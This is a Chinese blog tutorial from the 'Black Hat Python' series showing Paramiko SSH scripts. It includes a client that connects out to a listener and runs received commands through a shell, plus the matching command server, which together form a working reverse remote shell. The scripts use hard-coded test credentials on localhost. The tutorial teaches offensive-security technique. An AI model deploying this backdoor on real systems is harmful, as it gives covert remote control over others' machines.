Python黑帽子——通过Paramiko使用SSH

最新推荐文章于 2024-05-19 20:48:34 发布
最新推荐文章于 2024-05-19 20:48:34 发布
阅读量8.8k 收藏 9
点赞数 5
分类专栏: Python Security 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010726042/article/details/73565068
版权

首先下载paramiko

pip install paramiko

查看并启动ssh服务

service ssh status

service ssh start


另ssh添加用户的方法:

添加用户:

useradd -d /home/qing qing

passwd qing

赋予ssh权限

vi /etc/ssh/sshd_config

添加

AllowUsers:qing


创建bh_sshcmd.py文件,使用密码认证的方式登录并执行某命令:

#-*- coding:utf8 -*-

import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHClient()
    # client.load_host_keys('/home/root/.ssh/known_hosts') #支持用密钥认证代替密码验证,实际环境推荐使用密钥认证
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    #设置自动添加和保存目标ssh服务器的ssh密钥
    client.connect(ip, username=user, password=passwd)  #连接
    ssh_session = client.get_transport().open_session() #打开会话
    if ssh_session.active:
        ssh_session.exec_command(command)   #执行命令
        print ssh_session.recv(1024)    #返回命令执行结果(1024个字符)
    return

#调用函数,以用户pi及其密码连接并执行命令
ssh_command('127.0.0.1', 'qing', 'qing', 'id')



以上是建立ssh通道的方法,接下来建立可以持续发送命令的ssh客户端和ssh服务器

创建bh_sshRcmd.py文件

#-*- coding:utf8 -*-

import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command, port = 22):
    client = paramiko.SSHClient()
    # client.load_host_keys('/home/root/.ssh/known_hosts') #支持用密钥认证代替密码验证,实际环境推荐使用密钥认证
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    #设置自动添加和保存目标ssh服务器的ssh密钥
    client.connect(ip, port, username=user, password=passwd)  #连接
    ssh_session = client.get_transport().open_session() #打开会话
    if ssh_session.active:
        ssh_session.send(command)   #发送command这个字符串,并不是执行命令
        print ssh_session.recv(1024)    #返回命令执行结果(1024个字符)
        while True:
            command = ssh_session.recv(1024)    #从ssh服务器获取命令
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception, e:
                ssh_session.send(str(e))
        client.close()
    return

ssh_command('127.0.0.1', 'qing', 'qing', 'clientconnected',8001)
这里的command = 'clientconnected' 只是作为字符串,只是显示没有执行。


创建bh_sshserver.py文件:

利用ssh-keygen -t rsa 命令创建密钥文件/root/.ssh/id_rsa,不过这里为什么需要这个文件我不清楚,有知道的大神可以给我留言,非常感谢

[+] 这个文件是用来添加已经验证的用户密钥,add a host key to the list of keys used for server mode。可是每次登录都会验证用户和密码,所以还有保存这个的必要吗?

#-*- coding:utf8 -*-

import socket
import paramiko
import threading
import sys

# 使用 Paramiko示例文件的密钥
#host_key = paramiko.RSAKey(filename='test_rsa.key')
host_key = paramiko.RSAKey(filename='/root/.ssh/id_rsa')

class Server(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()
    def check_channel_request(self, kind, chanid):
        if kind == 'session':
			 return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def check_auth_password(self, username, password):
        if (username == 'qing') and (password == 'qing'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    #TCP socket
    #这里value设置为1,表示将SO_REUSEADDR标记为TRUE,操作系统会在服务器socket被关闭或服务器进程终止后马上释放该服务器的端口,否则操作系统会保留几分钟该端口。
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))   #绑定ip和端口
    sock.listen(100)    #最大连接数为100
    print '[+] Listening for connection ...'
    client, addr = sock.accept()
except Exception, e:
    print '[-] Listen failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection!'

try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException, x:
        print '[-] SSH negotiation failed'
    chan = bhSession.accept(20) #设置超时值为20
    print '[+] Authenticated!'
    print chan.recv(1024)
    chan.send("Welcome to bh_ssh")
    while True:
        try:
            command = raw_input("Enter command:").strip("\n")   #strip移除字符串头尾指定的字符(默认为空格),这里是换行
            if command != 'exit':
                chan.send(command)
                print chan.recv(1024) + '\n'
            else:
                chan.send('exit')
                print 'exiting'
                bhSession.close()
                raise Exception('exit')
        except KeyboardInterrupt:
            bhSession.close()
except Exception, e:
    print '[-] Caught exception: ' + str(e)
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)

先执行server端,再执行client。运行截图如上。注意server端监听的端口就是client文件中使用的端口。

Q1n6
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python使用paramiko实现ssh的功能详解
01-20
个人认为pythonparamiko模块是运维人员必学模块之一,其ssh登录功能是旅行居家必备工具。 安装paramiko很简单,pip install paramiko就搞定了,其依赖库会被一并安装。 paramiko的官方站点在这里:...
paramiko.ssh_exception.SSHException: Unable to connect to x.x.x: [Errno 111] Connection refuse
啊海的成长之路与自我修养
05-09 3120
raise SSHException( paramiko.ssh_exception.SSHException: Unable to connect to 47.97.11.75: [WinError 10061] 由于目标计算机积极拒绝,无法连接。
python ssh登录incompatible_Paramiko线程paramiko.ssh_exception.SSHException:不兼容的版本(1.5而不是2.0)...
weixin_39994627的博客
12-09 788
def trylogin(ipaddress):global user, passwdvmchannel = vmtransport.open_channel("direct-tcpip", dest_addr, local_addr)jhost = paramiko.SSHClient()jhost.set_missing_host_key_policy(paramiko.AutoAddPoli...
PythonParamiko:实现远程 SSH 连接与管理
最新发布
cc20100608的专栏
05-19 400
Paramiko 是一个功能强大的 Python SSH 库,它使得 SSH 连接和管理变得非常简单。通过本文的介绍,相信读者已经对 Paramiko 有了初步的了解。在实际应用中,可以根据具体需求选择相应的功能和 API,实现远程服务器的连接、管理和自动化操作。
window10环境下python + paramiko 进行sftp远程传输遇到的巨坑
qq_40788398的博客
04-24 3766
1.报错:paramiko.ssh_exception.SSHException : [WinError 10061] 由于目标计算机积极拒绝,无法连接。 代码如下: transport = paramiko.Transport(sock=(ip,22)) transport.connect(username='name', password='pwd') sftp = paramiko.SFTPClient.from_transport(transport) sftp.put('./output.m
通过paramiko远程执行windows命令出现:paramiko.ssh_exception.SSHException: Channel closed. 的解决方法
rongDang的博客
06-26 1万+
主要问题在于为windows上的ssh的设置,paramiko连接是没有问题的 想法是远程执行windows服务器上的python程序,通过ssh连接,我在windows服务器上通过winsshd软件个windows安装了ssh服务,但是在创建虚拟用户的时候没有给用户对应的操作权限,所以在通过paramiko使用ssh的账号密码连接执行远程windows服务器上的python脚本时会出现下面错误...
python——相关error问题与解决方案
庄小焱
03-25 4367
摘要 本博文绍paramiko模块上传文件失败:paramiko.ssh_exception.SSHException: Channel closed.,主要包括paramiko模块上传文件失败:paramiko.ssh_exception.SSHException: Channel closed. 一、问题 aramiko模块上传文件失败,提示paramiko.ssh_exception.SSHException: Channel closed. 使用python3 paramiko库实现向远程服
channel 1:open failed : administratively prohibited : open failed
道阻且长,行则将至
08-19 4697
使配置生效:systemctl restart sshd 或者/etc/rc.d/init.d/sshd restart。使配置生效:sudo sysctl -p 或者 /sbin/sysctl -e -p /etc/sysctl.conf。如果这一步完成了不再报错了,就可以不用管第二步,如果第一步还是不行,那么继续执行第二步操作。通过以上配置即可解决不能代理服务器远程端口的问题了。......
Connection reset by peer / paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
zywhehe的博客
02-13 5724
Python 报错处理 Connection reset by peer / paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
python使用paramiko模块通过ssh2协议对交换机进行配置的方法
09-18
总结,使用PythonParamiko模块,我们可以方便地通过SSH2协议对交换机进行自动化配置。通过创建SSH连接,打开通道,发送命令并接收响应,我们可以实现对远程设备的无接触管理,大大提高网络运维的效率。同时,结合...
Python paramiko模块使用解析(实现ssh
12-25
开发堡垒机之前,先来学习Pythonparamiko模块,该模块基于SSH用于连接远程服务器并执行相关操作 安装paramiko模块 pip3 install paramiko 基于用户密码方式 import paramiko # 创建SSH对象 ssh = paramiko.SSH...
使用Python paramiko模块利用多线程实现ssh并发执行操作
09-18
ssh是一个协议,OpenSSH是其中一个开源实现,paramikoPython的一个库,实现了SSHv2协议(底层使用cryptography)。这篇文章主要介绍了使用Python paramiko模块利用多线程实现ssh并发执行操作,需要的朋友可以参考下
[错误解决] paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
ccccccblock的博客
04-29 6767
最近项目中需配置sftp上传下载,配置好环境后连接报错。 报错信息如图: paramiko.ssh_exception.SSHException: Error reading SSH protocol banner 解决方式一 设置banner_timeout属性值 可更改site-packages源文件中paramiko库下面的transport.py下面的Transport代码如下: class Transport(threading.Thread, ClosingContextManager):
python3.7使用paramiko包连接远程主机报错:paramiko.ssh_exception.SSHException: could not get keys from ssh-agent
weixin_42492572的博客
11-07 942
python3.7使用paramiko包连接远程主机报错:paramiko.ssh_exception.SSHException: could not get keys from ssh-agent
vscode的ssh远程连接Linux错误
u014801954的博客
06-15 616
AllowTcpForwarding yes(将原本的no改成yes),然后reboot重启linux即可。提示错误:open failed: administratively prohibited
python错误13_Python Paramiko:错误13拒绝访问
weixin_39865277的博客
12-09 578
下面是一个pythonparamiko脚本,它试图创建一个服务器。每当我运行脚本时,我都会得到一个错误消息:访问被拒绝。错误的细节如下。在import socketimport sysimport threadingimport paramikofrom os.path import expanduserkeypath = expanduser("~/Desktop/test_rsa.key")h...
Python帽子 客与渗透测试编程之道(五)通过Paramiko 使用SSH
u013587606的博客
11-03 692
使用我们编写的bhnet工具介绍和发送数据非常方便,但有时候需要通过加密流量来避免,这是更明智的选择。最常用的办法就是使用secure shell(SSH)发送流量。 paramiko是用python语言写的一个模块,遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接。paramiko支持Linux, Solaris, BSD, MacOS X, Windows等平台通过SSH从一个平...
【vscode】ssh出现 open failedadministratively prohibited:open failed
记录学习的点滴
08-02 7199
VSCode无法连接到远程扩展主机服务器(错误WebSocketclosewithstatuscode1006)
Python模块学习 - Paramiko - 使用python抛出异常:Authentication failed.
热门推荐
猫咪控丶的博客
05-26 1万+
当抛出异常:paramiko.ssh_exception.AuthenticationException: Authentication failed. 请检查: 1.云服务器是否开启22端口? 2.传参时密码是否错误? 以我的腾讯云为例: 点击安全组规则,检查服务器是否开启22端口: 检查代码传参:账号密码是否正确: import paramiko # 实例化SSHClient client = paramiko.SSHClient() # 自动添加策略,保存服...
python paramiko使用_python Paramiko使用示例
05-27
好的,我可以为您提供一个 Python Paramiko使用示例。首先,您需要安装 Paramiko 库,可以使用以下命令在命令行中安装: ``` pip install paramiko ``` 接下来,您可以使用以下示例代码连接到远程服务器并执行命令: ```python import paramiko # 创建 SSH 客户端 ssh = paramiko.SSHClient() # 自动添加主机密钥 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接到远程服务器 ssh.connect('remote_server_ip', username='username', password='password') # 执行远程命令 stdin, stdout, stderr = ssh.exec_command('ls -l') # 读取命令输出 output = stdout.read().decode() # 打印输出结果 print(output) # 关闭 SSH 连接 ssh.close() ``` 这是一个简单的示例,您可以根据需要进行修改和扩展。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值